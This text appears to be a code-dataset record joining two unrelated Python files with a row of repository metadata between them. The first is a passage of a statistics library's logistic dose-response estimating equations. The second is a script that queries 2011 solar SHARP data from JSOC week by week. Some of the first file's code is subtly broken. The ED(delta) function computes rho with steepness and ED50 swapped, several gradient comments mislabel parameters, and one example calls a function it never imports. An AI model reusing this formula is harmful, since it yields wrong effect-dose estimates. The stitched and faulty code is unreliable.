different options.
Here, we use some general starting values that should perform well in many cases. For ED50, give the mid-point
between the maximum response and the minimum response. The initial value for steepness is more difficult. Ideally,
we would give a starting value of zero, but that will fail in this example. Giving a small positive starting value
works in this example. For the upper-bound, give the maximum response value as the initial. Finally, we use the
``lm`` solver.
Note
----
To summarize the recommendations, be sure to examine your data (e.g., scatterplot). This will help to determine the
initial starting values for the root-finding procedure. Otherwise, you may come across a convergence error.
>>> estr = MEstimator(psi, init=[(np.max(resp_data)+np.min(resp_data)) / 2,
>>> (np.max(resp_data)+np.min(resp_data)) / 2,
>>> np.max(resp_data)])
>>> estr.estimate(solver='lm')
Inspecting the parameter estimates, variance, and confidence intervals
>>> estr.theta
>>> estr.variance
>>> estr.confidence_intervals()
Inspecting the parameter estimates
>>> estr.theta[0] # ED(50)
>>> estr.theta[1] # steepness
>>> estr.theta[2] # upper limit
References
----------
Ritz C, Baty F, Streibig JC, & Gerhard D. (2015). Dose-response analysis using R. *PloS One*, 10(12), e0146021.
An H, Justin TL, Aubrey GB, Marron JS, & Dittmer DP. (2019). dr4pl: A Stable Convergence Algorithm for the 4
Parameter Logistic Model. *R J.*, 11(2), 171.
Inderjit, Streibig JC, & Olofsdotter M. (2002). Joint action of phenolic acid mixtures and its significance in
allelopathy research. *Physiologia Plantarum*, 114(3), 422-428.
"""
# Creating rho to cut down on typing
rho = (X / theta[0])**theta[1]
# Generalized 3PL model function for y-hat
fx = lower + (theta[2] - lower) / (1 + rho)
# Using a special implementation of natural log here
nested_log = np.log(X / theta[0], # ... to avoid dose=0 issues only take log
where=0 < X) # ... where dose>0 (otherwise puts zero in place)
# Calculate the derivatives for the gradient
deriv = np.array(((theta[2]-lower)*theta[1]/theta[0]*rho/(1+rho)**2, # Gradient for steepness
(theta[2]-lower) * nested_log * rho / (1+rho)**2, # Gradient for ED50
1 / (1 + rho)), ) # Gradient for upper limit
# Compute gradient and return for each i
return -2*(y - fx)*deriv
def ee_2p_logistic(theta, X, y, lower, upper):
r"""Default stacked estimating equation estimating equations for the two parameter logistic model (2PL). 2PL is
often used for dose-response and bioassay analyses. The estimating equations are
.. math::
\sum_i^n \psi(Y_i, X_i, \theta) = \sum_i^n (Y_i - expit(X_i^T \theta)) X_i = 0
\sum_i^n \psi(Y_i, X_i, \theta) = \sum_i^n (Y_i - expit(X_i^T \theta)) X_i = 0
\sum_i^n \psi(Y_i, X_i, \theta) = \sum_i^n (Y_i - expit(X_i^T \theta)) X_i = 0
Here, theta is a 1-by-2 array, where 2 are the 2 parameters of the 2PL. The first theta corresponds to the
effective dose (ED50), and the second corresponds to the steepness of the curve. Both the lower limit and upper
limit are pre-specified by the user (and no longer estimated).
Note
----
All provided estimating equations are meant to be wrapped inside a user-specified function. Throughtout, these
user-defined functions are defined as ``psi``.
Parameters
----------
theta : ndarray, list, vector
Theta in this case consists of 2 values. In general, starting values >0 are better choices for the 3PL model
X : ndarray, list, vector
1-dimensional vector of n dose values. No missing data should be included (missing data may cause unexpected
behavior).
y : ndarray, list, vector
1-dimensional vector of n response values. No missing data should be included (missing data may cause
unexpected behavior).
lower : int, float
Set value for the lower limit.
upper : int, float
Set value for the upper limit.
Returns
-------
array :
Returns a 2-by-n NumPy array evaluated for the input theta, y, X
Examples
--------
Construction of a estimating equation(s) with ``ee_2p_logistic`` should be done similar to the following
>>> from delicatessen import MEstimator
>>> from delicatessen.data import load_inderjit
>>> from delicatessen.estimating_equations import ee_2p_logistic
For demonstration, we use dose-response data from Inderjit et al. (2002), which can be loaded from ``delicatessen``
directly.
>>> d = load_inderjit() # Loading array of data
>>> dose_data = d[:, 1] # Dose data
>>> resp_data = d[:, 0] # Response data
Since there is a natural lower-bound of 0 for root growth, we set ``lower=0``. While a natural upper bound does not
exist for this example, we set ``upper=8`` for illustrative purposes. Defining psi, or the stacked estimating
equations
>>> def psi(theta):
>>> return ee_2p_logistic(theta=theta, X=dose_data, y=resp_data,
>>> lower=0, upper=8)
The 2PL model and others are harder to optimize compared to other estimating equations. Namely, the optimizer is
not aware of implicit bounds on the parameters. To reduce non-convergence issues, we can give the root-finder good
starting values.
First, the ED50 should be between the lower and upper limits. Second, the sign for the steepness depends on whether
the response declines (positive) or the response increases (negative). Finally, some solvers may be better suited
to the problem, so try a few different options.
Here, we use some general starting values that should perform well in many cases. For ED50, give the mid-point
between the maximum response and the minimum response. The initial value for steepness is more difficult. Ideally,
we would give a starting value of zero, but that will fail in this example. Giving a small positive starting value
works in this example. Finally, we use the ``lm`` solver.
Note
----
To summarize the recommendations, be sure to examine your data (e.g., scatterplot). This will help to determine the
initial starting values for the root-finding procedure. Otherwise, you may come across a convergence error.
>>> estr = MEstimator(psi, init=[(np.max(resp_data)+np.min(resp_data)) / 2,
>>> (np.max(resp_data)+np.min(resp_data)) / 2])
>>> estr.estimate(solver='lm')
Inspecting the parameter estimates, variance, and confidence intervals
>>> estr.theta
>>> estr.variance
>>> estr.confidence_intervals()
Inspecting the parameter estimates
>>> estr.theta[0] # ED(50)
>>> estr.theta[1] # steepness
References
----------
Ritz C, Baty F, Streibig JC, & Gerhard D. (2015). Dose-response analysis using R. *PloS One*, 10(12), e0146021.
An H, Justin TL, Aubrey GB, Marron JS, & Dittmer DP. (2019). dr4pl: A Stable Convergence Algorithm for the 4
Parameter Logistic Model. *R J.*, 11(2), 171.
Inderjit, Streibig JC, & Olofsdotter M. (2002). Joint action of phenolic acid mixtures and its significance in
allelopathy research. *Physiologia Plantarum*, 114(3), 422-428.
"""
# Creating rho to cut down on typing
rho = (X / theta[0])**theta[1]
# Generalized 3PL model function for y-hat
fx = lower + (upper - lower) / (1 + rho)
# Using a special implementatin of natural log here
nested_log = np.log(X / theta[0], # ... to avoid dose=0 issues only take log
where=0 < X) # ... where dose>0 (otherwise puts zero in place)
# Calculate the derivatives for the gradient
deriv = np.array(((upper-lower)*theta[1]/theta[0]*rho/(1+rho)**2, # Gradient for steepness
(upper-lower) * nested_log * rho / (1+rho)**2), ) # Gradient for ED50
# Compute gradient and return for each i
return -2*(y-fx)*deriv
def ee_effective_dose_delta(theta, y, delta, steepness, ed50, lower, upper):
r"""Default stacked estimating equation to pair with the 4 parameter logistic model for estimation of the
:math:`delta` effective dose. The estimating equation is
.. math::
\psi(Y_i, \theta) = \beta_1 + \frac{\beta_4 - \beta_1}{1 + (\theta / \beta_2)^{\beta_3}} - \beta_4(1-\delta)
- \beta_1 \delta
where theta is the :math:`ED(\delta)`, and the beta values are from a 4PL model (1: lower limit, 2: steepness,
3: ED(50), 4: upper limit). When lower or upper limits are place, the corresponding beta's are replaced by
constants. For proper uncertainty estimation, this estimating equation should be stacked together with the
correspond PL model.
Note
----
This estimating equation is meant to be paired with the estimating equations for either the 4PL, 3PL, or 2PL models.
Parameters
----------
theta : int, float
Theta value corresponding to the ED(alpha).
y : ndarray, list, vector
1-dimensional vector of n response values, used to construct correct shape for output.
delta : float
The effective dose level of interest, ED(alpha).
steepness : float
Estimated parameter for the steepness from the PL.
ed50 : float
Estimated parameter for the ED50, or ED(alpha=50), from the PL.
lower : int, float
Estimated parameter or pre-specified constant for the lower limit. This should be a pre-specified constant for
both the 3PL and 2PL.
upper : int, float
Estimated parameter or pre-specified constant for the lower limit. This should be a pre-specified constant for
the 2PL.
Returns
-------
array :
Returns a 1-by-n NumPy array evaluated for the input theta
Examples
--------
Construction of a estimating equations for ED25 with ``ee_3p_logistic`` should be done similar to the following
>>> from delicatessen import MEstimator
>>> from delicatessen.data import load_inderjit
>>> from delicatessen.estimating_equations import ee_2p_logistic, ee_effective_dose_delta
For demonstration, we use dose-response data from Inderjit et al. (2002), which can be loaded from ``delicatessen``
directly.
>>> d = load_inderjit() # Loading array of data
>>> dose_data = d[:, 1] # Dose data
>>> resp_data = d[:, 0] # Response data
Since there is a natural lower-bound of 0 for root growth, we set ``lower=0``. While a natural upper bound does not
exist for this example, we set ``upper=8`` for illustrative purposes. Defining psi, or the stacked estimating
equations
>>> def psi(theta):
>>> pl_model = ee_3p_logistic(theta=theta, X=dose_data, y=resp_data,
>>> lower=0)
>>> ed_25 = ee_effective_dose_delta(theta[3], y=resp_data, delta=0.20,
>>> steepness=theta[0], ed50=theta[1],
>>> lower=0, upper=theta[2])
>>> # Returning stacked estimating equations
>>> return np.vstack((pl_model,
>>> ed_25,))
Notice that the estimating equations are stacked in the order of the parameters in ``theta`` (the first 3 belong to
3PL and the last belong to ED(25)).
>>> estr = MEstimator(psi, init=[(np.max(resp_data)+np.min(resp_data)) / 2,
>>> (np.max(resp_data)+np.min(resp_data)) / 2,
>>> np.max(resp_data),
>>> (np.max(resp_data)+np.min(resp_data)) / 2])
>>> estr.estimate(solver='lm')
Inspecting the parameter estimates, variance, and confidence intervals
>>> estr.theta
>>> estr.variance
>>> estr.confidence_intervals()
Inspecting the parameter estimates
>>> estr.theta[0] # ED(50)
>>> estr.theta[1] # steepness
>>> estr.theta[2] # upper limit
>>> estr.theta[3] # ED(25)
References
----------
Ritz C, Baty F, Streibig JC, & Gerhard D. (2015). Dose-response analysis using R. *PloS One*, 10(12), e0146021.
An H, Justin TL, Aubrey GB, Marron JS, & Dittmer DP. (2019). dr4pl: A Stable Convergence Algorithm for the 4
Parameter Logistic Model. *R J.*, 11(2), 171.
Inderjit, Streibig JC, & Olofsdotter M. (2002). Joint action of phenolic acid mixtures and its significance in
allelopathy research. *Physiologia Plantarum*, 114(3), 422-428.
"""
# Creating rho to cut down on typing
rho = (theta / steepness)**ed50 # Theta is the corresponds ED(alpha) value
# Calculating the predicted value for f(x,\theta), or y-hat
fx = lower + (upper - lower) / (1 + rho)
# Subtracting off (Upper*(1-delta) + Lower*delta) since theta should result in zeroing of quantity
ed_delta = fx - upper*(1-delta) - lower*delta
# Returning constructed 1-by-ndarray for stacked estimating equations
return np.ones(np.asarray(y).shape[0])*ed_delta
| 45.299401
| 120
| 0.648821
| 3,277
| 22,695
| 4.43729
| 0.112298
| 0.014855
| 0.006877
| 0.010728
| 0.869541
| 0.835431
| 0.827591
| 0.82147
| 0.81645
| 0.778145
| 0
| 0.026294
| 0.250936
| 22,695
| 500
| 121
| 45.39
| 0.829059
| 0.854594
| 0
| 0.378378
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.108108
| false
| 0
| 0.027027
| 0
| 0.243243
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b212be1cf6b360e5bebd26d0b3a9a5239879159d
| 16,064
|
py
|
Python
|
Thesis/RNNs/to_create_2011.py
|
jmppmj/thesis_recurrent_neural_nets
|
adcb6ef11d8e4fb4099caac4ecb3edd5f623aa6c
|
[
"MIT"
] | null | null | null |
Thesis/RNNs/to_create_2011.py
|
jmppmj/thesis_recurrent_neural_nets
|
adcb6ef11d8e4fb4099caac4ecb3edd5f623aa6c
|
[
"MIT"
] | null | null | null |
Thesis/RNNs/to_create_2011.py
|
jmppmj/thesis_recurrent_neural_nets
|
adcb6ef11d8e4fb4099caac4ecb3edd5f623aa6c
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# coding: utf-8
#only run once~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
#creates csv with :::2011's::: feature data
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#:::hmi.sharp_720s from JSOC:::
#http://jsoc.stanford.edu/doc/data/hmi/sharp/sharp.htm
import pandas as pd
import drms #https://pypi.org/project/drms/
#compile :::2011::: feature dataframe
#multiple queries needed due to record return limit
def get_2011_Features():
h = drms.Client()
k = h.query('hmi.sharp_720s[][2011.01.01_TAI/7d]', key='T_REC, HARPNUM, NOAA_AR, TOTUSJH, TOTUSJZ, SAVNCPP, USFLUX, ABSNJZH, TOTPOT, SIZE_ACR, NACR, MEANPOT, SIZE, MEANJZH, SHRGT45, MEANSHR, MEANJZD, MEANALP, MEANGBT, MEANGAM, MEANGBZ, MEANGBH, NPIX')
f_dataframe = k
k = h.query('hmi.sharp_720s[][2011.01.08_TAI/7d]', key='T_REC, HARPNUM, NOAA_AR, TOTUSJH, TOTUSJZ, SAVNCPP, USFLUX, ABSNJZH, TOTPOT, SIZE_ACR, NACR, MEANPOT, SIZE, MEANJZH, SHRGT45, MEANSHR, MEANJZD, MEANALP, MEANGBT, MEANGAM, MEANGBZ, MEANGBH, NPIX')
f_dataframe = f_dataframe.append(k)
k = h.query('hmi.sharp_720s[][2011.01.15_TAI/7d]', key='T_REC, HARPNUM, NOAA_AR, TOTUSJH, TOTUSJZ, SAVNCPP, USFLUX, ABSNJZH, TOTPOT, SIZE_ACR, NACR, MEANPOT, SIZE, MEANJZH, SHRGT45, MEANSHR, MEANJZD, MEANALP, MEANGBT, MEANGAM, MEANGBZ, MEANGBH, NPIX')
f_dataframe = f_dataframe.append(k)
k = h.query('hmi.sharp_720s[][2011.01.22_TAI/7d]', key='T_REC, HARPNUM, NOAA_AR, TOTUSJH, TOTUSJZ, SAVNCPP, USFLUX, ABSNJZH, TOTPOT, SIZE_ACR, NACR, MEANPOT, SIZE, MEANJZH, SHRGT45, MEANSHR, MEANJZD, MEANALP, MEANGBT, MEANGAM, MEANGBZ, MEANGBH, NPIX')
f_dataframe = f_dataframe.append(k)
k = h.query('hmi.sharp_720s[][2011.01.29_TAI/7d]', key='T_REC, HARPNUM, NOAA_AR, TOTUSJH, TOTUSJZ, SAVNCPP, USFLUX, ABSNJZH, TOTPOT, SIZE_ACR, NACR, MEANPOT, SIZE, MEANJZH, SHRGT45, MEANSHR, MEANJZD, MEANALP, MEANGBT, MEANGAM, MEANGBZ, MEANGBH, NPIX')
f_dataframe = f_dataframe.append(k)
k = h.query('hmi.sharp_720s[][2011.02.05_TAI/7d]', key='T_REC, HARPNUM, NOAA_AR, TOTUSJH, TOTUSJZ, SAVNCPP, USFLUX, ABSNJZH, TOTPOT, SIZE_ACR, NACR, MEANPOT, SIZE, MEANJZH, SHRGT45, MEANSHR, MEANJZD, MEANALP, MEANGBT, MEANGAM, MEANGBZ, MEANGBH, NPIX')
f_dataframe = f_dataframe.append(k)
k = h.query('hmi.sharp_720s[][2011.02.12_TAI/7d]', key='T_REC, HARPNUM, NOAA_AR, TOTUSJH, TOTUSJZ, SAVNCPP, USFLUX, ABSNJZH, TOTPOT, SIZE_ACR, NACR, MEANPOT, SIZE, MEANJZH, SHRGT45, MEANSHR, MEANJZD, MEANALP, MEANGBT, MEANGAM, MEANGBZ, MEANGBH, NPIX')
f_dataframe = f_dataframe.append(k)
k = h.query('hmi.sharp_720s[][2011.02.19_TAI/7d]', key='T_REC, HARPNUM, NOAA_AR, TOTUSJH, TOTUSJZ, SAVNCPP, USFLUX, ABSNJZH, TOTPOT, SIZE_ACR, NACR, MEANPOT, SIZE, MEANJZH, SHRGT45, MEANSHR, MEANJZD, MEANALP, MEANGBT, MEANGAM, MEANGBZ, MEANGBH, NPIX')
f_dataframe = f_dataframe.append(k)
k = h.query('hmi.sharp_720s[][2011.02.26_TAI/7d]', key='T_REC, HARPNUM, NOAA_AR, TOTUSJH, TOTUSJZ, SAVNCPP, USFLUX, ABSNJZH, TOTPOT, SIZE_ACR, NACR, MEANPOT, SIZE, MEANJZH, SHRGT45, MEANSHR, MEANJZD, MEANALP, MEANGBT, MEANGAM, MEANGBZ, MEANGBH, NPIX')
f_dataframe = f_dataframe.append(k)
k = h.query('hmi.sharp_720s[][2011.03.05_TAI/7d]', key='T_REC, HARPNUM, NOAA_AR, TOTUSJH, TOTUSJZ, SAVNCPP, USFLUX, ABSNJZH, TOTPOT, SIZE_ACR, NACR, MEANPOT, SIZE, MEANJZH, SHRGT45, MEANSHR, MEANJZD, MEANALP, MEANGBT, MEANGAM, MEANGBZ, MEANGBH, NPIX')
f_dataframe = f_dataframe.append(k)
k = h.query('hmi.sharp_720s[][2011.03.12_TAI/7d]', key='T_REC, HARPNUM, NOAA_AR, TOTUSJH, TOTUSJZ, SAVNCPP, USFLUX, ABSNJZH, TOTPOT, SIZE_ACR, NACR, MEANPOT, SIZE, MEANJZH, SHRGT45, MEANSHR, MEANJZD, MEANALP, MEANGBT, MEANGAM, MEANGBZ, MEANGBH, NPIX')
f_dataframe = f_dataframe.append(k)
k = h.query('hmi.sharp_720s[][2011.03.19_TAI/7d]', key='T_REC, HARPNUM, NOAA_AR, TOTUSJH, TOTUSJZ, SAVNCPP, USFLUX, ABSNJZH, TOTPOT, SIZE_ACR, NACR, MEANPOT, SIZE, MEANJZH, SHRGT45, MEANSHR, MEANJZD, MEANALP, MEANGBT, MEANGAM, MEANGBZ, MEANGBH, NPIX')
f_dataframe = f_dataframe.append(k)
k = h.query('hmi.sharp_720s[][2011.03.26_TAI/7d]', key='T_REC, HARPNUM, NOAA_AR, TOTUSJH, TOTUSJZ, SAVNCPP, USFLUX, ABSNJZH, TOTPOT, SIZE_ACR, NACR, MEANPOT, SIZE, MEANJZH, SHRGT45, MEANSHR, MEANJZD, MEANALP, MEANGBT, MEANGAM, MEANGBZ, MEANGBH, NPIX')
f_dataframe = f_dataframe.append(k)
k = h.query('hmi.sharp_720s[][2011.04.02_TAI/7d]', key='T_REC, HARPNUM, NOAA_AR, TOTUSJH, TOTUSJZ, SAVNCPP, USFLUX, ABSNJZH, TOTPOT, SIZE_ACR, NACR, MEANPOT, SIZE, MEANJZH, SHRGT45, MEANSHR, MEANJZD, MEANALP, MEANGBT, MEANGAM, MEANGBZ, MEANGBH, NPIX')
f_dataframe = f_dataframe.append(k)
k = h.query('hmi.sharp_720s[][2011.04.09_TAI/7d]', key='T_REC, HARPNUM, NOAA_AR, TOTUSJH, TOTUSJZ, SAVNCPP, USFLUX, ABSNJZH, TOTPOT, SIZE_ACR, NACR, MEANPOT, SIZE, MEANJZH, SHRGT45, MEANSHR, MEANJZD, MEANALP, MEANGBT, MEANGAM, MEANGBZ, MEANGBH, NPIX')
f_dataframe = f_dataframe.append(k)
k = h.query('hmi.sharp_720s[][2011.04.16_TAI/7d]', key='T_REC, HARPNUM, NOAA_AR, TOTUSJH, TOTUSJZ, SAVNCPP, USFLUX, ABSNJZH, TOTPOT, SIZE_ACR, NACR, MEANPOT, SIZE, MEANJZH, SHRGT45, MEANSHR, MEANJZD, MEANALP, MEANGBT, MEANGAM, MEANGBZ, MEANGBH, NPIX')
f_dataframe = f_dataframe.append(k)
k = h.query('hmi.sharp_720s[][2011.04.23_TAI/7d]', key='T_REC, HARPNUM, NOAA_AR, TOTUSJH, TOTUSJZ, SAVNCPP, USFLUX, ABSNJZH, TOTPOT, SIZE_ACR, NACR, MEANPOT, SIZE, MEANJZH, SHRGT45, MEANSHR, MEANJZD, MEANALP, MEANGBT, MEANGAM, MEANGBZ, MEANGBH, NPIX')
f_dataframe = f_dataframe.append(k)
k = h.query('hmi.sharp_720s[][2011.04.30_TAI/7d]', key='T_REC, HARPNUM, NOAA_AR, TOTUSJH, TOTUSJZ, SAVNCPP, USFLUX, ABSNJZH, TOTPOT, SIZE_ACR, NACR, MEANPOT, SIZE, MEANJZH, SHRGT45, MEANSHR, MEANJZD, MEANALP, MEANGBT, MEANGAM, MEANGBZ, MEANGBH, NPIX')
f_dataframe = f_dataframe.append(k)
k = h.query('hmi.sharp_720s[][2011.05.07_TAI/7d]', key='T_REC, HARPNUM, NOAA_AR, TOTUSJH, TOTUSJZ, SAVNCPP, USFLUX, ABSNJZH, TOTPOT, SIZE_ACR, NACR, MEANPOT, SIZE, MEANJZH, SHRGT45, MEANSHR, MEANJZD, MEANALP, MEANGBT, MEANGAM, MEANGBZ, MEANGBH, NPIX')
f_dataframe = f_dataframe.append(k)
k = h.query('hmi.sharp_720s[][2011.05.14_TAI/7d]', key='T_REC, HARPNUM, NOAA_AR, TOTUSJH, TOTUSJZ, SAVNCPP, USFLUX, ABSNJZH, TOTPOT, SIZE_ACR, NACR, MEANPOT, SIZE, MEANJZH, SHRGT45, MEANSHR, MEANJZD, MEANALP, MEANGBT, MEANGAM, MEANGBZ, MEANGBH, NPIX')
f_dataframe = f_dataframe.append(k)
k = h.query('hmi.sharp_720s[][2011.05.21_TAI/7d]', key='T_REC, HARPNUM, NOAA_AR, TOTUSJH, TOTUSJZ, SAVNCPP, USFLUX, ABSNJZH, TOTPOT, SIZE_ACR, NACR, MEANPOT, SIZE, MEANJZH, SHRGT45, MEANSHR, MEANJZD, MEANALP, MEANGBT, MEANGAM, MEANGBZ, MEANGBH, NPIX')
f_dataframe = f_dataframe.append(k)
k = h.query('hmi.sharp_720s[][2011.05.28_TAI/7d]', key='T_REC, HARPNUM, NOAA_AR, TOTUSJH, TOTUSJZ, SAVNCPP, USFLUX, ABSNJZH, TOTPOT, SIZE_ACR, NACR, MEANPOT, SIZE, MEANJZH, SHRGT45, MEANSHR, MEANJZD, MEANALP, MEANGBT, MEANGAM, MEANGBZ, MEANGBH, NPIX')
f_dataframe = f_dataframe.append(k)
k = h.query('hmi.sharp_720s[][2011.06.04_TAI/7d]', key='T_REC, HARPNUM, NOAA_AR, TOTUSJH, TOTUSJZ, SAVNCPP, USFLUX, ABSNJZH, TOTPOT, SIZE_ACR, NACR, MEANPOT, SIZE, MEANJZH, SHRGT45, MEANSHR, MEANJZD, MEANALP, MEANGBT, MEANGAM, MEANGBZ, MEANGBH, NPIX')
f_dataframe = f_dataframe.append(k)
k = h.query('hmi.sharp_720s[][2011.06.11_TAI/7d]', key='T_REC, HARPNUM, NOAA_AR, TOTUSJH, TOTUSJZ, SAVNCPP, USFLUX, ABSNJZH, TOTPOT, SIZE_ACR, NACR, MEANPOT, SIZE, MEANJZH, SHRGT45, MEANSHR, MEANJZD, MEANALP, MEANGBT, MEANGAM, MEANGBZ, MEANGBH, NPIX')
f_dataframe = f_dataframe.append(k)
k = h.query('hmi.sharp_720s[][2011.06.18_TAI/7d]', key='T_REC, HARPNUM, NOAA_AR, TOTUSJH, TOTUSJZ, SAVNCPP, USFLUX, ABSNJZH, TOTPOT, SIZE_ACR, NACR, MEANPOT, SIZE, MEANJZH, SHRGT45, MEANSHR, MEANJZD, MEANALP, MEANGBT, MEANGAM, MEANGBZ, MEANGBH, NPIX')
f_dataframe = f_dataframe.append(k)
k = h.query('hmi.sharp_720s[][2011.06.25_TAI/7d]', key='T_REC, HARPNUM, NOAA_AR, TOTUSJH, TOTUSJZ, SAVNCPP, USFLUX, ABSNJZH, TOTPOT, SIZE_ACR, NACR, MEANPOT, SIZE, MEANJZH, SHRGT45, MEANSHR, MEANJZD, MEANALP, MEANGBT, MEANGAM, MEANGBZ, MEANGBH, NPIX')
f_dataframe = f_dataframe.append(k)
k = h.query('hmi.sharp_720s[][2011.07.02_TAI/7d]', key='T_REC, HARPNUM, NOAA_AR, TOTUSJH, TOTUSJZ, SAVNCPP, USFLUX, ABSNJZH, TOTPOT, SIZE_ACR, NACR, MEANPOT, SIZE, MEANJZH, SHRGT45, MEANSHR, MEANJZD, MEANALP, MEANGBT, MEANGAM, MEANGBZ, MEANGBH, NPIX')
f_dataframe = f_dataframe.append(k)
k = h.query('hmi.sharp_720s[][2011.07.09_TAI/7d]', key='T_REC, HARPNUM, NOAA_AR, TOTUSJH, TOTUSJZ, SAVNCPP, USFLUX, ABSNJZH, TOTPOT, SIZE_ACR, NACR, MEANPOT, SIZE, MEANJZH, SHRGT45, MEANSHR, MEANJZD, MEANALP, MEANGBT, MEANGAM, MEANGBZ, MEANGBH, NPIX')
f_dataframe = f_dataframe.append(k)
k = h.query('hmi.sharp_720s[][2011.07.16_TAI/7d]', key='T_REC, HARPNUM, NOAA_AR, TOTUSJH, TOTUSJZ, SAVNCPP, USFLUX, ABSNJZH, TOTPOT, SIZE_ACR, NACR, MEANPOT, SIZE, MEANJZH, SHRGT45, MEANSHR, MEANJZD, MEANALP, MEANGBT, MEANGAM, MEANGBZ, MEANGBH, NPIX')
f_dataframe = f_dataframe.append(k)
k = h.query('hmi.sharp_720s[][2011.07.23_TAI/7d]', key='T_REC, HARPNUM, NOAA_AR, TOTUSJH, TOTUSJZ, SAVNCPP, USFLUX, ABSNJZH, TOTPOT, SIZE_ACR, NACR, MEANPOT, SIZE, MEANJZH, SHRGT45, MEANSHR, MEANJZD, MEANALP, MEANGBT, MEANGAM, MEANGBZ, MEANGBH, NPIX')
f_dataframe = f_dataframe.append(k)
k = h.query('hmi.sharp_720s[][2011.07.30_TAI/7d]', key='T_REC, HARPNUM, NOAA_AR, TOTUSJH, TOTUSJZ, SAVNCPP, USFLUX, ABSNJZH, TOTPOT, SIZE_ACR, NACR, MEANPOT, SIZE, MEANJZH, SHRGT45, MEANSHR, MEANJZD, MEANALP, MEANGBT, MEANGAM, MEANGBZ, MEANGBH, NPIX')
f_dataframe = f_dataframe.append(k)
k = h.query('hmi.sharp_720s[][2011.08.06_TAI/7d]', key='T_REC, HARPNUM, NOAA_AR, TOTUSJH, TOTUSJZ, SAVNCPP, USFLUX, ABSNJZH, TOTPOT, SIZE_ACR, NACR, MEANPOT, SIZE, MEANJZH, SHRGT45, MEANSHR, MEANJZD, MEANALP, MEANGBT, MEANGAM, MEANGBZ, MEANGBH, NPIX')
f_dataframe = f_dataframe.append(k)
k = h.query('hmi.sharp_720s[][2011.08.13_TAI/7d]', key='T_REC, HARPNUM, NOAA_AR, TOTUSJH, TOTUSJZ, SAVNCPP, USFLUX, ABSNJZH, TOTPOT, SIZE_ACR, NACR, MEANPOT, SIZE, MEANJZH, SHRGT45, MEANSHR, MEANJZD, MEANALP, MEANGBT, MEANGAM, MEANGBZ, MEANGBH, NPIX')
f_dataframe = f_dataframe.append(k)
k = h.query('hmi.sharp_720s[][2011.08.20_TAI/7d]', key='T_REC, HARPNUM, NOAA_AR, TOTUSJH, TOTUSJZ, SAVNCPP, USFLUX, ABSNJZH, TOTPOT, SIZE_ACR, NACR, MEANPOT, SIZE, MEANJZH, SHRGT45, MEANSHR, MEANJZD, MEANALP, MEANGBT, MEANGAM, MEANGBZ, MEANGBH, NPIX')
f_dataframe = f_dataframe.append(k)
k = h.query('hmi.sharp_720s[][2011.08.27_TAI/7d]', key='T_REC, HARPNUM, NOAA_AR, TOTUSJH, TOTUSJZ, SAVNCPP, USFLUX, ABSNJZH, TOTPOT, SIZE_ACR, NACR, MEANPOT, SIZE, MEANJZH, SHRGT45, MEANSHR, MEANJZD, MEANALP, MEANGBT, MEANGAM, MEANGBZ, MEANGBH, NPIX')
f_dataframe = f_dataframe.append(k)
k = h.query('hmi.sharp_720s[][2011.09.03_TAI/7d]', key='T_REC, HARPNUM, NOAA_AR, TOTUSJH, TOTUSJZ, SAVNCPP, USFLUX, ABSNJZH, TOTPOT, SIZE_ACR, NACR, MEANPOT, SIZE, MEANJZH, SHRGT45, MEANSHR, MEANJZD, MEANALP, MEANGBT, MEANGAM, MEANGBZ, MEANGBH, NPIX')
f_dataframe = f_dataframe.append(k)
k = h.query('hmi.sharp_720s[][2011.09.10_TAI/7d]', key='T_REC, HARPNUM, NOAA_AR, TOTUSJH, TOTUSJZ, SAVNCPP, USFLUX, ABSNJZH, TOTPOT, SIZE_ACR, NACR, MEANPOT, SIZE, MEANJZH, SHRGT45, MEANSHR, MEANJZD, MEANALP, MEANGBT, MEANGAM, MEANGBZ, MEANGBH, NPIX')
f_dataframe = f_dataframe.append(k)
k = h.query('hmi.sharp_720s[][2011.09.17_TAI/7d]', key='T_REC, HARPNUM, NOAA_AR, TOTUSJH, TOTUSJZ, SAVNCPP, USFLUX, ABSNJZH, TOTPOT, SIZE_ACR, NACR, MEANPOT, SIZE, MEANJZH, SHRGT45, MEANSHR, MEANJZD, MEANALP, MEANGBT, MEANGAM, MEANGBZ, MEANGBH, NPIX')
f_dataframe = f_dataframe.append(k)
k = h.query('hmi.sharp_720s[][2011.09.24_TAI/7d]', key='T_REC, HARPNUM, NOAA_AR, TOTUSJH, TOTUSJZ, SAVNCPP, USFLUX, ABSNJZH, TOTPOT, SIZE_ACR, NACR, MEANPOT, SIZE, MEANJZH, SHRGT45, MEANSHR, MEANJZD, MEANALP, MEANGBT, MEANGAM, MEANGBZ, MEANGBH, NPIX')
f_dataframe = f_dataframe.append(k)
k = h.query('hmi.sharp_720s[][2011.10.01_TAI/7d]', key='T_REC, HARPNUM, NOAA_AR, TOTUSJH, TOTUSJZ, SAVNCPP, USFLUX, ABSNJZH, TOTPOT, SIZE_ACR, NACR, MEANPOT, SIZE, MEANJZH, SHRGT45, MEANSHR, MEANJZD, MEANALP, MEANGBT, MEANGAM, MEANGBZ, MEANGBH, NPIX')
f_dataframe = f_dataframe.append(k)
k = h.query('hmi.sharp_720s[][2011.10.08_TAI/7d]', key='T_REC, HARPNUM, NOAA_AR, TOTUSJH, TOTUSJZ, SAVNCPP, USFLUX, ABSNJZH, TOTPOT, SIZE_ACR, NACR, MEANPOT, SIZE, MEANJZH, SHRGT45, MEANSHR, MEANJZD, MEANALP, MEANGBT, MEANGAM, MEANGBZ, MEANGBH, NPIX')
f_dataframe = f_dataframe.append(k)
